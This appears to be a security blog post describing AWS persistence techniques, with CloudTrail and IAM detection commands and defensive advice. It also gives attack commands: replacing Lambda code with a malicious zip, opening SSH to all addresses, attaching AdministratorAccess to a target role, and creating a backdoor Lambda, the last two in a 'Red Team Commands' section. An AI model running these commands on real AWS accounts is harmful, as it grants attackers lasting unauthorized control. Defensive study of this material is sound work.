Listen to this Post
In AWS, persistence techniques can be categorized into Data Access Persistence (r–) and Operational Control Persistence (rwx).
Data Access Persistence (Stealthy Data Exfiltration)
Attackers add their AWS account to resource-based policies (S3 Buckets, SNS Topics, SQS Queues) to maintain stealthy access to data.
Operational Control Persistence (Full Control Backdooring)
- Creating IAM users/roles
- Backdooring Lambda functions
- Modifying security groups
- Role Chain Juggling: Manipulating IAM roles that assume each other to maintain session persistence (max 60-minute sessions via
STS AssumeRole).
You Should Know:
Detecting & Preventing AWS Persistence Attacks
1. Monitoring Unusual Cross-Account Access
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=PutBucketPolicy --region us-east-1
Defense:
- Enable AWS GuardDuty for anomaly detection.
- Use AWS Config to track S3 bucket policy changes.
2. Detecting IAM Backdoors
aws iam get-account-authorization-details --query 'UserDetailList[?contains(UserName,<code>backdoor</code>)]'
Defense:
- Implement IAM Access Analyzer to detect unintended permissions.
- Use CloudTrail logs to monitor
CreateUser,AttachUserPolicy.
3. Identifying Role Chain Juggling
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole --query 'Events[?contains(Resources[].ARN,<code>RoleA</code>)]'
Defense:
- Restrict role trust policies to specific ARNs, not wildcards (
"Principal": { "AWS": "" }). - Set CloudWatch Alerts for repeated `AssumeRole` calls.
4. Backdooring Lambda for Persistence
aws lambda update-function-code --function-name MyFunction --zip-file fileb://malicious.zip
Defense:
- Enable Lambda Code Signing.
- Monitor unexpected Lambda code updates via CloudTrail.
5. Security Group Manipulation
aws ec2 authorize-security-group-ingress --group-id sg-123456 --protocol tcp --port 22 --cidr 0.0.0.0/0
Defense:
- Use AWS Security Hub to detect open security groups.
- Enforce least privilege via SCP (Service Control Policies).
What Undercode Say:
AWS persistence attacks are evolving—focus on detecting stealthy data access (S3 policies) and operational control (IAM, Lambda, Role Chaining).
Key Commands for Blue Teams:
Check recent IAM changes
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser
Detect public S3 buckets
aws s3api list-buckets --query 'Buckets[].Name' | xargs -I {} aws s3api get-bucket-acl --bucket {}
Find circular role trusts
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS==``]]'
Red Team Commands:
Backdoor an IAM Role aws iam attach-role-policy --role-name TargetRole --policy-arn arn:aws:iam::aws:policy/AdministratorAccess Maintain Lambda persistence aws lambda create-function --function-name PersistBackdoor --runtime python3.8 --role arn:aws:iam::123456789012:role/lambda-exec --handler lambda_function.handler --code S3Bucket=malicious-bucket,S3Key=backdoor.zip
Expected Output:
- Detection Alerts for unusual `AssumeRole` chains.
- CloudTrail logs revealing IAM backdoors.
- S3 Bucket Policies modified for cross-account access.
Prediction:
AWS persistence techniques will shift towards serverless (Lambda, Step Functions) and cross-account deception, requiring more advanced behavioral analytics for detection.
Reference:
IT/Security Reporter URL:
Reported By: Activity 7337709583387262978 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
